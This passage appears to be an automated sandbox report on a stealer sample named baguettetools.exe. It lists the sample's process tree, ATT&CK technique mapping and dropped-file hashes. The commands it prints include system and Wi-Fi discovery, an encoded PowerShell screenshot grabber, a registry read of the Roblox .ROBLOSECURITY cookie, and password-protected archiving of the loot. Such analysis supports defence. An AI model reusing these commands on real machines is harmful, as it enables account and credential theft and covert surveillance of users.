      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2192
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4820
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:5996
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:5008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:6036
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:3680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:2036
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3648
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5b4ojtgl\5b4ojtgl.cmdline"
        5⤵
        
        PID:4504
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES430F.tmp" "c:\Users\Admin\AppData\Local\Temp\5b4ojtgl\CSC9BB88CEE6BC04C78A146C3A3B4E8535.TMP"
        6⤵
        
        PID:3392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5640
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3956
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5760
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5732
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5780
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:6052
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4984
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      PID:1536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:4568
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:2084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI53722\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\dzR4v.zip" *"
    3⤵
    PID:2488
  - - C:\Users\Admin\AppData\Local\Temp\_MEI53722\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI53722\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\dzR4v.zip" *
      4⤵
      PID:5732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:1904

C:\Users\Admin\Desktop\baguettetools.exe
"C:\Users\Admin\Desktop\baguettetools.exe"
1⤵
PID:384
- C:\Users\Admin\Desktop\baguettetools.exe
  "C:\Users\Admin\Desktop\baguettetools.exe"
  2⤵
  PID:3956

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
50a8221b93fbd2628ac460dd408a9fc1

SHA1
7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

SHA256
46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

SHA512
27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\yeb58ys6.default-release\activity-stream.discovery_stream.json

Filesize
22KB

MD5
2abc8b0a9c4f35b689364f357284d40a

SHA1
af0f676f84262634210088089675b2064f9da974

SHA256
ec12963e570f56cf469a99afa69e37b075cbbb58b39fecd2d70a393095c1b856

SHA512
2a2a40d6504bdec5d31e6be235be4825352e526a3f29987f07a2332f8c752dd1e6896e01ef466ba397697967ab9c0765db6b4ec8fbc0a189c02c371c77d4a9cd

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\yeb58ys6.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

Filesize
7KB

MD5
c460716b62456449360b23cf5663f275

SHA1
06573a83d88286153066bae7062cc9300e567d92

SHA256
0ec0f16f92d876a9c1140d4c11e2b346a9292984d9a854360e54e99fdcd99cc0

SHA512
476bc3a333aace4c75d9a971ef202d5889561e10d237792ca89f8d379280262ce98cf3d4728460696f8d7ff429a508237764bf4a9ccb59fd615aee07bdcadf30

Download Submit
C:\Users\Admin\AppData\Local\Temp\5b4ojtgl\5b4ojtgl.dll

Filesize
4KB

MD5
c9e14ecfd765d6141c3a6aaa92970ecf

SHA1
c38e2495a2233692b35690756417e2f3bf3f21ec

SHA256
b0f697e11e4f007bbbc96970273d3d57d7f6bc5111603091d23438d0c7f4028e

SHA512
b498f70494d1ac90b1330fd08b720dea8a58659fb49c5fa61d1eafe52cdec7c943cd67f2274e8dbf090c3e84a33636588f076f0e9aca1f2925b05ddae7289139

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES430F.tmp

Filesize
1KB

MD5
3e2809f1b6bf2d795f6190377ba3ccbb

SHA1
0c7ebdee9279a3b1a99896c33ee2f85cc7d5153f

SHA256
f61d8151705b7820408e7f16af15ee61f176b165a6b4d9d152c30617ab994ff6

SHA512
a43d2428fda00caced38532d435af4bc64c763c024e97c49a795d6d00b42794040304b36681da043d9d557f1a83a55a8ecd053eb847fa2a6e82df424355baa4b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI3842\blank.aes

Filesize
117KB

MD5
eb76cdb03514bb74d8453b7362f61450

SHA1
cc5d6334874e7da02d6482759b173fec3a046d13

SHA256
863876a194eaf80808f3b64f36d59e614d78aeb0858b9b4abd8f6b8a9649aea1

SHA512
519a173b8d1891152cdd1cc98ba643a7f429460c9c358412a60d9dbfcff5402b6878f804cfb0bfc66f76d3e3b0b43290a949b2d41d594418898d668736768a87

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI53722\VCRUNTIME140.dll

Filesize
116KB

MD5
be8dbe2dc77ebe7f88f910c61aec691a

SHA1
a19f08bb2b1c1de5bb61daf9f2304531321e0e40

SHA256
4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

SHA512
0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI53722\_bz2.pyd

Filesize
48KB

MD5
adaa3e7ab77129bbc4ed3d9c4adee584

SHA1
21aabd32b9cbfe0161539454138a43d5dbc73b65

SHA256
a1d8ce2c1efaa854bb0f9df43ebccf861ded6f8afb83c9a8b881904906359f55

SHA512
b73d3aba135fb5e0d907d430266754da2f02e714264cd4a33c1bfdeda4740bbe82d43056f1a7a85f4a8ed28cb7798693512b6d4cdb899ce65b6d271cf5e5e264

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI53722\_ctypes.pyd

Filesize
59KB

MD5
0f090d4159937400db90f1512fda50c8

SHA1
01cbcb413e50f3c204901dff7171998792133583

SHA256
ae6512a770673e268554363f2d1d2a202d0a337baf233c3e63335026d223be31

SHA512
151156a28d023cf68fd38cbecbe1484fc3f6bf525e7354fcced294f8e479e07453fd3fc22a6b8d049ddf0ad6306d2c7051ece4e7de1137578541a9aabefe3f12

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI53722\_decimal.pyd

Filesize
107KB

MD5
a592ba2bb04f53b47d87b4f7b0c8b328

SHA1
ca8c65ab0aab0f98af8cc1c1cf31c9744e56a33c

SHA256
19fe4a08b0b321ff9413da88e519f4a4a4510481605b250f2906a32e8bb14938

SHA512
1576fdc90d8678da0dab8253fdd8ec8b3ce924fa392f35d8c62207a85c31c26dae5524e983e97872933538551cbef9cd4ba9206bcd16f2ae0858ab11574d09e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI53722\_hashlib.pyd

Filesize
35KB

MD5
4dd4c7d3a7b954a337607b8b8c4a21d1

SHA1
b6318b830d73cbf9fa45be2915f852b5a5d81906

SHA256
926692fcecdb7e65a14ac0786e1f58e880ea8dae7f7bb3aa7f2c758c23f2af70

SHA512
dab02496c066a70a98334e841a0164df1a6e72e890ce66be440b10fdeecdfe7b8d0ec39d1af402ae72c8aa19763c92dd7404f3a829c9fdcf871c01b1aed122e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI53722\_lzma.pyd

Filesize
86KB

MD5
17082c94b383bca187eb13487425ec2c

SHA1
517df08af5c283ca08b7545b446c6c2309f45b8b

SHA256
ddbfef8da4a0d8c1c8c24d171de65b9f4069e2edb8f33ef5dfecf93cb2643bd4

SHA512
2b565d595e9a95aefae396fc7d66ee0aeb9bfe3c23d64540ba080ba39a484ab1c50f040161896cca6620c182f0b02a9db677dab099dca3cae863e6e2542bb12c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI53722\_queue.pyd

Filesize
26KB

MD5
97cc5797405f90b20927e29867bc3c4f

SHA1
a2e7d2399cca252cc54fc1609621d441dff1ace5

SHA256
fb304ca68b41e573713abb012196ef1ae2d5b5e659d846bbf46b1f13946c2a39

SHA512
77780fe0951473762990cbef056b3bba36cda9299b1a7d31d9059a792f13b1a072ce3ab26d312c59805a7a2e9773b7300b406fd3af5e2d1270676a7862b9ca48

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI53722\_socket.pyd

Filesize
44KB

MD5
f52c1c015fb147729a7caab03b2f64f4

SHA1
8aebc2b18a02f1c6c7494271f7f9e779014bee31

SHA256
06d91ac02b00a29180f4520521de2f7de2593dd9c52e1c2b294e717c826a1b7d

SHA512
8ab076c551f0a6ffe02c26b4f0fbb2ea7756d4650fe39f53d7bd61f4cb6ae81460d46d8535c89c6d626e7c605882b39843f7f70dd50e9daf27af0f8cadd49c0f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI53722\_sqlite3.pyd

Filesize
57KB

MD5
37a88a19bb1de9cf33141872c2c534cb

SHA1
a9209ec10af81913d9fd1d0dd6f1890d275617e8

SHA256
cca0fbe5268ab181bf8afbdc4af258d0fbd819317a78ddd1f58bef7d2f197350

SHA512
3a22064505b80b51ebaa0d534f17431f9449c8f2b155ec794f9c4f5508470576366ed3ba5d2de7ddf1836c6e638f26cad8cb0cc496daf30ee38ca97557238733

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI53722\_ssl.pyd

Filesize
66KB

MD5
34402efc9a34b91768cf1280cc846c77

SHA1
20553a06fe807c274b0228ec6a6a49a11ec8b7c1

SHA256
fe52c34028c5d62430ea7a9be034557ccfecdddda9c57874f2832f584fedb031

SHA512
2b8a50f67b5d29db3e300bc0dd670dad0ba069afa9acf566cad03b8a993a0e49f1e28059737d3b21cef2321a13eff12249c80fa46832939d2bf6d8555490e99c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI53722\base_library.zip

Filesize
1.3MB

MD5
fe165df1db950b64688a2e617b4aca88

SHA1
71cae64d1edd9931ef75e8ef28e812e518b14dde

SHA256
071241ac0fd6e733147a71625de5ead3d7702e73f8d1cbebf3d772cbdce0be35

SHA512
e492a6278676ef944363149a503c7fade9d229bddce7afa919f5e72138f49557619b0bdba68f523fffe7fbca2ccfd5e3269355febaf01f4830c1a4cc67d2e513

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI53722\blank.aes

Filesize
117KB

MD5
2c071302672ea93d93c70dec51572094

SHA1
0fb9db944364825e1f6e6d08cd46d3d98a6d5475

SHA256
aeb002db8ce98ec5da6f9e87dd90da658ed982ff7d0045f2c9e07d306326bebc

SHA512
4496d1d3a5e15aa5c57fdb45473a993e23636376d56c964f64acc3b1e9461d320d87af5d4cd53b1c6d9c87c06d730bab62da6a36309210ace9c8f36af304983d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI53722\bound.blank

Filesize
20KB

MD5
941a4bfbac51790bf770175d3208f2ed

SHA1
bb0010e5e71ba74b4325196b7a48f119f91284f7

SHA256
e062038ee1278da3121a43c792714914b7f5cc7f168ee00bafc201eeec952159

SHA512
